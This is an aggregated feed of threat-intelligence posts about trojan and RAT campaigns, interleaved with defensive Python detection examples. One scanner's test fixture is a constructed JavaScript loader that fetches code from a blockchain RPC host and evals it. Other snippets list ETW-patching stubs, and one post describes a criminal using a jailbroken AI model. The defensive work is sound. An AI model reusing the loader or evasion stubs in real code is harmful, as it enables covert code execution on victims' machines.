#trojan — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #trojan, aggregated by home.social.
-
A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure
JINX-0164, a financially motivated threat actor active since mid-2025, has been conducting sophisticated campaigns against cryptocurrency organizations. The actor employs LinkedIn-based social engineering, posing as recruiters or business partners to deliver custom macOS malware including AUDIOFIX (a Python-based infostealer and RAT) and MINIRAT (a lightweight Go backdoor). Their operations focus on compromising developer endpoints to steal cryptocurrency wallet credentials, cloud secrets, and GitHub tokens. The attackers then pivot to CI/CD infrastructure, injecting malicious code into repositories to enable lateral movement. In April 2026, they executed a supply chain attack by trojanizing the npm package @velora-dex/sdk. The group masks activity using VPN services and demonstrates advanced capabilities including credential harvesting from password managers, browser extensions, and development tools.
Pulse ID: 6a181e409d755171f4ac356c
Pulse Link: https://otx.alienvault.com/pulse/6a181e409d755171f4ac356c
Pulse Author: AlienVault
Created: 2026-05-28 10:51:44
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#BackDoor #Browser #Cloud #CredentialHarvesting #CyberSecurity #Endpoint #GitHub #InfoSec #InfoStealer #LinkedIn #Mac #MacOS #Malware #NPM #OTX #OpenThreatExchange #Password #Python #RAT #SocialEngineering #SupplyChain #Trojan #VPN #Word #bot #cryptocurrency #AlienVault
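The pulse above ends with a trojanized npm package reaching downstream projects through CI/CD. The first thing a practitioner wants is a check that can be run against a lockfile before the next install. The following is an added example and is not code from the pulse or from the report it summarizes. The only indicator it takes from the pulse is the package name @velora-dex/sdk; the pulse gives no affected versions, so the watchlist matches on name alone. The lockfile it scans is constructed for the example, and it relies on two facts about npm lockfiles version 2 and 3: dependencies are keyed by their node_modules path under "packages", and packages with preinstall/install/postinstall hooks carry "hasInstallScript": true.

```python
"""Audit an npm lockfile for supply-chain red flags.

Added example, not code from the OTX pulse or the report it summarizes.
The only name taken from the pulse is the trojanized package
@velora-dex/sdk; it gives no affected versions, so the watchlist matches
on name alone. The lockfile below is constructed for this example.
"""
import json
from urllib.parse import urlparse

WATCHLIST = {"@velora-dex/sdk"}          # names from the pulse; versions unknown
TRUSTED_HOSTS = {"registry.npmjs.org"}   # where tarballs are expected to come from

# Constructed lockfile (npm lockfileVersion 3 layout) used as sample input.
SAMPLE_LOCKFILE = json.dumps({
    "name": "trading-bot",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "trading-bot"},
        "node_modules/@velora-dex/sdk": {
            "version": "1.4.2",
            "resolved": "https://registry.npmjs.org/@velora-dex/sdk/-/sdk-1.4.2.tgz",
            "hasInstallScript": True,
        },
        "node_modules/left-pad": {
            "version": "1.3.0",
            "resolved": "https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz",
        },
        "node_modules/left-pad/node_modules/totally-fine": {
            "version": "0.0.1",
            "resolved": "https://cdn.example.invalid/totally-fine-0.0.1.tgz",
        },
    },
})


def package_name(path):
    """Map a lockfile path to a package name: 'node_modules/a/node_modules/@s/b' -> '@s/b'."""
    return path.rsplit("node_modules/", 1)[-1]


def audit_lockfile(text):
    """Return (package, version, reason) tuples for every red flag found."""
    lock = json.loads(text)
    if lock.get("lockfileVersion", 1) < 2:
        raise ValueError("lockfileVersion 1 has no 'packages' map; regenerate with npm 7 or newer")
    findings = []
    for path, meta in lock["packages"].items():
        if path == "":
            continue  # the root project entry, not a dependency
        name = package_name(path)
        version = meta.get("version", "?")
        if name in WATCHLIST:
            findings.append((name, version, "on watchlist"))
        if meta.get("hasInstallScript"):
            # npm records this for packages with preinstall/install/postinstall hooks;
            # an install script is how a trojanized package runs code at `npm install`.
            findings.append((name, version, "runs an install lifecycle script"))
        host = urlparse(meta.get("resolved", "")).hostname
        if host and host not in TRUSTED_HOSTS:
            findings.append((name, version, f"tarball fetched from {host}"))
    return findings


if __name__ == "__main__":
    for name, version, reason in audit_lockfile(SAMPLE_LOCKFILE):
        print(f"{name}@{version}: {reason}")
```

Run it over a real package-lock.json by replacing SAMPLE_LOCKFILE with the file contents. Install scripts are legitimate for native modules, so the second check is a review queue rather than a verdict; the point of running it in CI is that a newly appearing install script on a package that never had one is exactly the change a trojanized release introduces.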
-
Smart Contracts for C&C: How ClearFake Hid in Plain Sight on BSC Testnet
Threat actors exploited the EtherHiding technique to store ClearFake payload routing instructions within smart contracts on the BNB Smart Chain testnet, creating an immutable command-and-control infrastructure that cannot be taken down. The attack began with injected JavaScript on a compromised Swiss website that queried blockchain contracts to deliver malicious payloads. Victims passing anti-analysis checks were fingerprinted by operating system and routed to platform-specific ClickFix social engineering overlays. The campaign simultaneously deployed SectopRAT, a .NET-based remote access trojan capable of browser session hijacking, and ACRStealer, a C++ infostealer targeting credentials and cryptocurrency wallets. An on-chain execution tracker confirmed each compromise in real time. Four smart contracts shared a single deployer wallet, with the oldest deployed nearly a year before analysis, indicating a long-running, actively maintained operation.
Pulse ID: 6a15ba2632bd7e246e9c1250
Pulse Link: https://otx.alienvault.com/pulse/6a15ba2632bd7e246e9c1250
Pulse Author: AlienVault
Created: 2026-05-26 15:20:06
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#BlockChain #Browser #CandC #ClearFake #CyberSecurity #EtherHiding #InfoSec #InfoStealer #Java #JavaScript #NET #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #SocialEngineering #Trojan #bot #cryptocurrency #AlienVault
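Because the routing data lives on a public chain, takedown requests do nothing; the deployer can also keep rewriting the contract's stored values, so a blocklist of contract addresses ages well while the payload it points to keeps changing. Detection therefore happens at the web layer: the injected JavaScript has to read the chain from the visitor's browser and then execute what it gets back. The scanner below is an added example, not code from the pulse or from the analysis behind it. It flags a script that combines a JSON-RPC eth_call, a public BNB Smart Chain RPC host (mainnet hostnames contain bsc-dataseed, testnet hostnames data-seed-prebsc), a decode step and an execution sink, and it extracts any 20-byte contract addresses for the blocklist. The injected and benign scripts it runs on are constructed, and the contract address in them is a placeholder, not a real indicator.

```python
"""Heuristic scan for EtherHiding-style loaders in page JavaScript.

Added example, not code from the OTX pulse or the underlying analysis.
It flags a script that combines (1) an Ethereum JSON-RPC eth_call,
(2) a BNB Smart Chain RPC endpoint, and (3) a decode-and-execute sink,
and extracts any 20-byte contract addresses for blocking. The scripts
and the contract address below are constructed, not real indicators.
"""
import re

# Indicator families. Public BSC RPC hostnames contain "bsc-dataseed"
# (mainnet) or "data-seed-prebsc" (testnet, the chain this campaign used).
RPC_CALL = re.compile(r"""eth_call""")
BSC_RPC = re.compile(r"""(data-seed-prebsc|bsc-dataseed)[\w.-]*\.binance\.org""")
DECODER = re.compile(r"""\b(atob|fromCharCode)\s*\(""")
EXEC_SINK = re.compile(
    r"""\b(eval|Function|document\.write)\s*\(|\.innerHTML\s*=|createElement\(\s*["']script["']"""
)
CONTRACT = re.compile(r"""0x[0-9a-fA-F]{40}\b""")


def scan_script(source):
    """Return matched indicator names, contract addresses and a verdict."""
    hits = {
        "eth_call": bool(RPC_CALL.search(source)),
        "bsc_rpc": bool(BSC_RPC.search(source)),
        "decoder": bool(DECODER.search(source)),
        "exec_sink": bool(EXEC_SINK.search(source)),
    }
    contracts = sorted(set(CONTRACT.findall(source)))
    # Reading the chain is not malicious by itself (wallet front-ends do it);
    # the pattern is chain read -> decode -> execute inside an ordinary page.
    if hits["eth_call"] and hits["exec_sink"]:
        verdict = "likely EtherHiding loader"
    elif hits["eth_call"] or hits["bsc_rpc"]:
        verdict = "blockchain read, review"
    else:
        verdict = "no indicators"
    return {
        "indicators": [name for name, hit in hits.items() if hit],
        "contracts": contracts,
        "verdict": verdict,
    }


# Constructed placeholder address; a real indicator would come from the pulse.
CONTRACT_ADDR = "0x" + "ab" * 20

# Constructed injected script in the shape described for ClearFake:
# query a contract, hex-decode the returned string, execute it.
INJECTED = r"""
(async()=>{const r=await fetch("https://data-seed-prebsc-1-s1.binance.org:8545/",{method:"POST",
body:JSON.stringify({jsonrpc:"2.0",id:1,method:"eth_call",params:[{to:"CONTRACT_ADDR",data:"0x20965255"},"latest"]})});
const j=await r.json();
const s=j.result.slice(2).match(/../g).map(h=>String.fromCharCode(parseInt(h,16))).join("");
eval(s);})();
""".replace("CONTRACT_ADDR", CONTRACT_ADDR)

# Constructed benign script that only talks to the site's own API.
BENIGN = r"""
fetch("/api/prices").then(r=>r.json()).then(d=>{document.getElementById("p").textContent=d.btc;});
"""


if __name__ == "__main__":
    for label, src in (("injected", INJECTED), ("benign", BENIGN)):
        print(label, scan_script(src))
```

Point it at the inline and external scripts of a page you own (a periodic crawl of your own site catches the injected-script stage before visitors do), and pair it with an egress rule: a workstation that reaches a blockchain RPC endpoint from a browser session on an unrelated site has no business doing so, and that connection is the one observable that the chain's immutability does not hide.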
-
RemotePE: The Lazarus RAT that lives in memory
A sophisticated memory-only toolset used by a North Korean Lazarus subgroup targeting financial and cryptocurrency organizations consists of three malware families forming a chain. DPAPILoader decrypts and loads RemotePELoader from disk using Windows Data Protection API. RemotePELoader beacons to command-and-control servers and retrieves RemotePE, a fully-fledged remote access trojan executed entirely in memory without filesystem artifacts. The toolset employs environmental keying via DPAPI, EDR evasion through HellsGate technique and ETW patching, actor-in-the-loop payload delivery, and shared hosting infrastructure on Namecheap. RemotePE features comprehensive RAT capabilities including file operations, process management, command execution, and a plugin system for dynamically loading additional payloads, while maintaining persistence through masquerading as legitimate Windows services.
Pulse ID: 6a1447f25db6bc082d5093cb
Pulse Link: https://otx.alienvault.com/pulse/6a1447f25db6bc082d5093cb
Pulse Author: AlienVault
Created: 2026-05-25 13:00:34
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #EDR #Edge #InfoSec #Korea #Lazarus #Malware #Namecheap #NorthKorea #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #Trojan #Windows #bot #cryptocurrency #AlienVault
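Two pieces of this chain leave something a responder can test for. DPAPI keying means the on-disk stage only decrypts where the protecting user's master key exists, which is also why decryption for analysis has to happen on the victim host or with that user's master key; the blob itself is recognisable by its fixed header, and that header names the master key it needs. ETW patching overwrites the first bytes of ntdll!EtwEventWrite with a stub that returns immediately, and those stubs are few and well known. The triage code below is an added example, not code from the pulse or from the research behind it. It assumes the documented DPAPI blob layout (version 1, provider GUID df9d8cd0-1501-11d1-8c7a-00c04fc297eb, master-key version, master-key GUID, flags) and a short list of common ETW patch stubs; the blob and the prologue bytes it checks are constructed, and the "intact" prologue is a plausible x64 shape rather than a copy of any particular ntdll build.

```python
"""Host triage checks for a DPAPI-keyed, memory-only loader chain.

Added example, not code from the OTX pulse or the research behind it.
Two checks: (1) recognise a DPAPI blob on disk by its header, which is
what a stage decrypted with CryptUnprotectData looks like at rest, and
recover the master-key GUID an analyst needs to decrypt it on the victim
host; (2) classify the first bytes of ntdll!EtwEventWrite to spot the
common inline patches used to silence ETW. All bytes below are constructed.
"""
import struct
import uuid

# Every DPAPI blob starts with version 1 and the DPAPI provider GUID,
# stored in the mixed-endian layout Windows uses for GUIDs.
DPAPI_PROVIDER = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
DPAPI_MAGIC = struct.pack("<I", 1) + DPAPI_PROVIDER.bytes_le


def dpapi_blob_info(data):
    """Return master-key version/GUID and flags for a DPAPI blob, else None."""
    if len(data) < 44 or data[:20] != DPAPI_MAGIC:
        return None
    mk_version, = struct.unpack_from("<I", data, 20)
    mk_guid = uuid.UUID(bytes_le=data[24:40])   # names %APPDATA%\Microsoft\Protect\<SID>\<guid>
    flags, = struct.unpack_from("<I", data, 40)
    return {"master_key_version": mk_version, "master_key_guid": str(mk_guid), "flags": flags}


# Stubs commonly written over EtwEventWrite so every ETW event becomes a no-op.
ETW_PATCH_STUBS = {
    b"\xc3": "ret",
    b"\x33\xc0\xc3": "xor eax,eax; ret",
    b"\x31\xc0\xc3": "xor eax,eax; ret",
    b"\x48\x33\xc0\xc3": "xor rax,rax; ret",
    b"\x48\x31\xc0\xc3": "xor rax,rax; ret",
    b"\xb8\x00\x00\x00\x00\xc3": "mov eax,0; ret",
}


def classify_etw_prologue(prologue):
    """Label the first bytes of EtwEventWrite: 'patched: <stub>', 'hooked' or 'intact'."""
    for stub, name in ETW_PATCH_STUBS.items():
        if prologue.startswith(stub):
            return f"patched: {name}"
    if prologue[:1] in (b"\xe9", b"\xeb"):
        # A jmp at entry is an inline hook; EDRs install these too, so
        # resolve the jump target before calling it malicious.
        return "hooked"
    return "intact"


# Constructed samples: a header-only blob with a made-up master-key GUID,
# a plausible intact x64 prologue (mov r11,rsp; sub rsp,0x58), and a patched one.
SAMPLE_BLOB = (DPAPI_MAGIC + struct.pack("<I", 1)
               + uuid.UUID("11111111-2222-3333-4444-555555555555").bytes_le
               + struct.pack("<I", 0) + b"\x00" * 16)
INTACT_PROLOGUE = b"\x4c\x8b\xdc\x48\x83\xec\x58"
PATCHED_PROLOGUE = b"\x48\x33\xc0\xc3\x90\x90\x90"


if __name__ == "__main__":
    print(dpapi_blob_info(SAMPLE_BLOB))
    print(classify_etw_prologue(INTACT_PROLOGUE), classify_etw_prologue(PATCHED_PROLOGUE))
```

In practice the first function runs over files in the suspect directory (the DPAPI header is also a usable YARA hex string), and the second over the bytes read from a live process at the exported address of EtwEventWrite, comparing each process against a clean copy of ntdll from disk. HellsGate-style direct syscalls leave no patch in ntdll at all, so a clean prologue rules out only this one evasion.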
-
Android Trojan Abuses Commercial Rooting Tool and Steals Private Information
Rootnik is an Android trojan that exploits vulnerabilities in Android 4.3 and earlier by weaponizing a Chinese commercial rooting tool called Root Assistant. The malicious operation spreads through repackaged legitimate applications distributed globally, affecting users primarily in the United States, Malaysia, Thailand, Lebanon and Taiwan. After installation, Rootnik gains root access using stolen exploits, installs four persistent APK files to the system partition, and performs aggressive app promotion campaigns. The trojan silently installs and uninstalls applications, downloads and executes code remotely, and harvests sensitive data including WiFi passwords, location information, device identifiers, and MAC addresses. The malware maintains command and control infrastructure through multiple domains and generates revenue through aggressive advertising that interrupts user activity regardless of the current application.
Pulse ID: 6a123f4adef80b0c4d8ccd35
Pulse Link: https://otx.alienvault.com/pulse/6a123f4adef80b0c4d8ccd35
Pulse Author: AlienVault
Created: 2026-05-23 23:59:06
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#APK #Android #Chinese #CyberSecurity #InfoSec #Mac #Malware #OTX #OpenThreatExchange #Password #Passwords #RAT #Thailand #Trojan #UnitedStates #Word #bot #AlienVault
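A repackaged app that carries a rooting kit and the APKs it will later write to /system has to bring them along inside the archive, so static triage of the APK catches the pattern before anything runs: native executables outside the lib/<abi>/ tree, nested APKs in assets, and DEX files hidden outside the archive root for dynamic loading. The checker below is an added example, not code from the pulse or the original report, and the archive it inspects is constructed in memory rather than a Rootnik sample. It relies only on file magics (PK for zip, 0x7f ELF for native binaries, "dex\n" for Dalvik bytecode) and on the convention that an APK is a zip containing AndroidManifest.xml.

```python
"""Static triage of an APK for repackaging and bundled root tooling.

Added example, not code from the OTX pulse or the original analysis.
A repackaged app that carries a rooting kit and the APKs it will drop
into /system shows up as nested APKs and ELF executables inside the
archive, outside the normal lib/<abi>/ tree. The APK below is
constructed in memory; it is not a Rootnik sample.
"""
import io
import zipfile

ELF_MAGIC = b"\x7fELF"
DEX_MAGIC = b"dex\n"
ZIP_MAGIC = b"PK\x03\x04"


def is_apk(blob):
    """An APK is a zip archive that carries AndroidManifest.xml."""
    if not blob.startswith(ZIP_MAGIC):
        return False
    try:
        with zipfile.ZipFile(io.BytesIO(blob)) as z:
            return "AndroidManifest.xml" in z.namelist()
    except zipfile.BadZipFile:
        return False


def triage_apk(blob):
    """Return (entry, reason) tuples for suspicious members of an APK."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as z:
        for info in z.infolist():
            if info.is_dir():
                continue
            data = z.read(info.filename)   # small sample archive; stream large members in real use
            name = info.filename
            if data.startswith(ELF_MAGIC) and not name.startswith("lib/"):
                findings.append((name, "ELF binary outside lib/"))
            if data.startswith(DEX_MAGIC) and "/" in name:
                findings.append((name, "DEX outside archive root (dynamic code loading)"))
            if is_apk(data):
                findings.append((name, "nested APK (dropper payload)"))
    return findings


def build_zip(members):
    """Helper for the constructed sample: members is {name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, data in members.items():
            z.writestr(name, data)
    return buf.getvalue()


# Constructed APK-shaped archive: a legitimate native library under lib/,
# plus a root binary, a nested APK and a hidden DEX under assets/.
FAKE_DEX = DEX_MAGIC + b"035\x00" + b"\x00" * 8
FAKE_ELF = ELF_MAGIC + b"\x01\x01\x01" + b"\x00" * 9
INNER_APK = build_zip({"AndroidManifest.xml": b"<manifest/>", "classes.dex": FAKE_DEX})
SAMPLE_APK = build_zip({
    "AndroidManifest.xml": b"<manifest/>",
    "classes.dex": FAKE_DEX,
    "lib/armeabi-v7a/libnative.so": FAKE_ELF,
    "assets/su": FAKE_ELF,
    "assets/update.apk": INNER_APK,
    "assets/plugin.jar": FAKE_DEX,
})


if __name__ == "__main__":
    for entry, reason in triage_apk(SAMPLE_APK):
        print(f"{entry}: {reason}")
```

Repackaged apps are also re-signed with the attacker's key, so the complementary check, not shown here, is comparing the signing certificate in META-INF with the one on the store copy of the same app. None of this helps a device already rooted by the payload: once the four APKs sit on the system partition, a factory reset does not remove them and the device needs reflashing.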
-
Tracking Iranian APT Screening Serpens’ 2026 Espionage Campaigns
Unit 42 researchers identified six new remote access Trojan variants deployed by Iran-nexus APT group Screening Serpens between February and April 2026, coinciding with a regional conflict starting February 28, 2026. The group targeted entities in the U.S., Israel, UAE, and other Middle Eastern locations, primarily focusing on technology sector professionals through highly tailored social engineering using personalized recruitment lures. Two new malware families, MiniUpdate and MiniJunk V2, were discovered featuring advanced techniques including AppDomainManager hijacking that manipulates .NET application initialization to disable security mechanisms. The campaigns demonstrated increased technical capabilities and operational resilience, with each variant using dedicated C2 infrastructure hosted on Azure. The attacks leveraged DLL sideloading, scheduled tasks for persistence, and sophisticated evasion techniques to maintain long-term access for espionage purposes.
Pulse ID: 6a109360ffcb2c8229a150c7
Pulse Link: https://otx.alienvault.com/pulse/6a109360ffcb2c8229a150c7
Pulse Author: AlienVault
Created: 2026-05-22 17:33:20
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#Azure #CyberSecurity #Espionage #InfoSec #Iran #Israel #Malware #MiddleEast #NET #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #SMS #SideLoading #SocialEngineering #Trojan #UAE #Unit42 #bot #AlienVault
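AppDomainManager hijacking works because the .NET Framework will load an assembly and type named in a program's .exe.config (or in the APPDOMAIN_MANAGER_ASM and APPDOMAIN_MANAGER_TYPE environment variables) and run it before the program's own entry point, so a signed, legitimate host executable ends up executing attacker code. That makes the config file the cheapest place to hunt. The scanner below is an added example, not code from the pulse or from the Unit 42 research. It assumes the documented runtime elements appDomainManagerAssembly and appDomainManagerType, the documented etwEnable runtime switch, and the two environment variable names; the config it parses is constructed.

```python
"""Hunt for AppDomainManager hijacking in .NET application config files.

Added example, not code from the OTX pulse or the Unit 42 research. The
.NET Framework lets an .exe.config name an assembly and type to run as
the AppDomainManager before the program's own Main; the same hijack can
be set through the APPDOMAIN_MANAGER_ASM / APPDOMAIN_MANAGER_TYPE
environment variables. The config text below is constructed.
"""
import os
import xml.etree.ElementTree as ET

HIJACK_ELEMENTS = ("appDomainManagerAssembly", "appDomainManagerType")
HIJACK_ENV = ("APPDOMAIN_MANAGER_ASM", "APPDOMAIN_MANAGER_TYPE")


def scan_config(text, path="<string>"):
    """Return (path, element, value) tuples for hijack-relevant <runtime> settings."""
    findings = []
    try:
        root = ET.fromstring(text)
    except ET.ParseError:
        return findings
    runtime = root.find("runtime")
    if runtime is None:
        return findings
    for child in runtime:
        if child.tag in HIJACK_ELEMENTS:
            findings.append((path, child.tag, child.get("value", "")))
        elif child.tag == "etwEnable" and child.get("enabled", "").lower() == "false":
            # Documented runtime switch; turning ETW off next to a custom
            # AppDomainManager is a strong signal.
            findings.append((path, child.tag, "enabled=false"))
    return findings


def scan_tree(root_dir):
    """Walk a directory and scan every *.exe.config it contains."""
    findings = []
    for dirpath, _, names in os.walk(root_dir):
        for name in names:
            if name.lower().endswith(".exe.config"):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_config(fh.read(), full))
    return findings


def scan_environment(env=None):
    """Report hijack variables present in the process environment."""
    env = os.environ if env is None else env
    return [(key, env[key]) for key in HIJACK_ENV if key in env]


# Constructed config that redirects a legitimate host .exe to an attacker
# assembly sitting beside it. Names are placeholders, not real indicators.
SAMPLE_CONFIG = """<configuration>
  <runtime>
    <appDomainManagerAssembly value="UpdaterCore, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
    <appDomainManagerType value="UpdaterCore.Manager" />
    <etwEnable enabled="false" />
  </runtime>
</configuration>
"""


if __name__ == "__main__":
    for path, element, value in scan_config(SAMPLE_CONFIG, "updater.exe.config"):
        print(f"{path}: <{element}> {value}")
    print(scan_environment())
```

A hit is not proof on its own: a handful of legitimate products ship an AppDomainManager. What distinguishes the hijack is the pairing the pulse describes: the config sits next to a signed executable that was dropped recently, the named assembly has no signature, and a scheduled task launches the executable. Run scan_tree over user-writable directories and the scheduled-task action paths, and treat scan_environment as a check on the processes those tasks start.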
-
SilverFox APT Distributes ValleyRAT Using Fake Microsoft Teams
ValleyRAT malware is distributed through fake Microsoft Teams download sites using trojanized installers and DLL sideloading techniques. The campaign uses multi-stage execution, persistence mechanisms and encrypted C2 communication to evade detection and conduct data theft activities on compromised systems.
Pulse ID: 6a10c2d0bebcbfb2b4e42090
Pulse Link: https://otx.alienvault.com/pulse/6a10c2d0bebcbfb2b4e42090
Pulse Author: cryptocti
Created: 2026-05-22 20:55:44
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #DataTheft #InfoSec #Malware #Microsoft #MicrosoftTeams #OTX #OpenThreatExchange #RAT #SMS #SideLoading #Trojan #bot #cryptocti
-
One Man, One AI, One Fake Persona: Inside the 5-Year Influence and Fraud 'Patriot Bait' Campaign
A solo Russian-speaking threat actor tracked as 'bandcampro' operated a five-year MAGA-themed Telegram channel with approximately 17,000 subscribers, initially forwarding cryptocurrency scam content before pivoting to AI-automated operations in September 2025. The actor utilized jailbroken Google Gemini to generate QAnon-styled posts, deploy infrastructure, manage stolen API keys, and run credential theft operations targeting politically engaged American audiences. The campaign weaponized cultural alignment with QAnon and MAGA communities to facilitate cryptocurrency fraud rather than political influence. Through AI assistance, the actor cracked 29 WordPress admin credentials, infiltrated at least one company, deployed remote access trojans disguised as cryptocurrency wallets, and operated a gamified chatbot called 'QFS 2.0 Terminal'. The operation demonstrates how frontier AI systems enable scalable, low-cost cybercriminal activities by allowing a single actor to perform tasks traditionally requiring enti...
Pulse ID: 6a0f8f3596d6a5268e168a10
Pulse Link: https://otx.alienvault.com/pulse/6a0f8f3596d6a5268e168a10
Pulse Author: AlienVault
Created: 2026-05-21 23:03:17
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #Google #InfoSec #IoT #OTX #OpenThreatExchange #RAT #RDP #RemoteAccessTrojan #Russia #Telegram #Trojan #Word #Wordpress #bot #cryptocurrency #AlienVault
-
SilverFox APT Distributes ValleyRAT Using Fake Microsoft Teams
ValleyRAT malware is distributed through fake Microsoft Teams download sites using trojanized installers and DLL sideloading techniques. The campaign uses multi-stage execution, persistence mechanisms and encrypted C2 communication to evade detection and conduct data theft activities on compromised systems.
Pulse ID: 6a0f791e50f93201e61e0f88
Pulse Link: https://otx.alienvault.com/pulse/6a0f791e50f93201e61e0f88
Pulse Author: cryptocti
Created: 2026-05-21 21:29:02
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #DataTheft #InfoSec #Malware #Microsoft #MicrosoftTeams #OTX #OpenThreatExchange #RAT #SMS #SideLoading #Trojan #bot #cryptocti
-
Inside a Tor Backed Supply Chain Worm
A sophisticated npm supply chain attack was uncovered involving the typosquatted package crypto-javascri, designed to mimic the legitimate crypto-js library. The malware harvests npm and GitHub credentials from infected systems, hijacks maintainer accounts, and automatically republishes trojanized versions of packages under trusted identities. The final payload incorporates a weaponized Arti Tor client with credential theft, cryptomining capabilities, privilege escalation via SUID exploitation, and systemd-based persistence mechanisms. The campaign specifically targets Linux developer systems and CI/CD environments, using Tor-based command-and-control infrastructure to maintain anonymity and resilience. The attack creates significant downstream supply chain risk through its worm-like propagation model.
Pulse ID: 6a0d970b3015e77563f4a9fa
Pulse Link: https://otx.alienvault.com/pulse/6a0d970b3015e77563f4a9fa
Pulse Author: AlienVault
Created: 2026-05-20 11:12:11
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CryptoMining #CyberSecurity #GitHub #InfoSec #Java #Linux #Malware #Mimic #NPM #OTX #OpenThreatExchange #RAT #Rust #SMS #SupplyChain #Trojan #Worm #bot #AlienVault
-
Tracking TamperedChef Clusters via Certificate and Code Reuse
Multiple threat clusters designated as CL-CRI-1089, CL-UNK-1090, and CL-UNK-1110 have been distributing trojanized productivity software through malicious advertising campaigns since 2023. These applications, including PDF editors, calendars, and compression tools, appear legitimate but contain remote access capabilities enabling deployment of information stealers, proxy tooling, and RATs. The campaigns leverage code-signing certificates, remain dormant for weeks to months before activation, and affect organizations globally with over 4,000 samples identified across 100 variants. CL-CRI-1089 operations utilize Ukrainian, Malaysian, and British infrastructure with 34 unique code-signing entities, while CL-UNK-1090 demonstrates vertical integration between advertising agencies and malware creation using primarily Israeli infrastructure with 39 corporations involved. Distribution occurs through sophisticated malvertising employing professional websites, CDN delivery, and search engine optimization techniques.
Pulse ID: 6a0dae41682ec38e55d1aa12
Pulse Link: https://otx.alienvault.com/pulse/6a0dae41682ec38e55d1aa12
Pulse Author: AlienVault
Created: 2026-05-20 12:51:13
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CDN #CyberSecurity #InfoSec #Israel #Malvertising #Malware #OTX #OpenThreatExchange #PDF #Proxy #RAT #Trojan #UK #Ukr #Ukrainian #bot #AlienVault
-
Inside Banana RAT: From Build Server to Banking Fraud
An MDR investigation successfully mapped the complete operational infrastructure of Banana RAT, a Brazilian banking trojan operated by threat cluster SHADOW-WATER-063. The investigation uncovered both server-side and client-side components, revealing a sophisticated FastAPI-based polymorphic payload generation system that produces hash-unique builds to evade detection. The malware employs layered obfuscation, AES-wrapped payloads, and fileless PowerShell execution. Once deployed, it enables operator-driven fraud through remote input control, keylogging, screen streaming, bank-branded overlays, and Pix QR code interception specifically targeting Brazilian financial institutions. The tooling exclusively targets 16 Brazilian banks and crypto exchanges, with all operator artifacts written in Brazilian Portuguese, indicating a financially motivated actor operating within the Tetrade banking trojan ecosystem.
Pulse ID: 6a0ce3af84b924ad15e27920
Pulse Link: https://otx.alienvault.com/pulse/6a0ce3af84b924ad15e27920
Pulse Author: AlienVault
Created: 2026-05-19 22:26:55
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#Bank #BankingTrojan #Brazil #CryptoExchange #CyberSecurity #InfoSec #Malware #OTX #OpenThreatExchange #PowerShell #RAT #RCE #Trojan #bot #AlienVault
-
Chinese APT Campaign Targets Entities with Updated FDMTP Backdoor
Beginning in late September 2025, multiple affected hosts were observed making requests to domains impersonating content delivery networks (CDNs), including infrastructure masquerading as Yahoo- and Apple-affiliated services. Across these cases, Darktrace identified a consistent behavioral execution pattern: the retrieval of legitimate binaries alongside malicious Dynamic Link Libraries (DLLs), enabling sideloading and execution of a modular .NET-based Remote Access Trojan (RAT) framework.
Pulse ID: 6a0b6898afd39bdd2dd6f142
Pulse Link: https://otx.alienvault.com/pulse/6a0b6898afd39bdd2dd6f142
Pulse Author: AlienVault
Created: 2026-05-18 19:29:26
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#BackDoor #CDN #Chinese #CyberSecurity #DNS #Darktrace #InfoSec #NET #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #SideLoading #Trojan #bot #AlienVault
-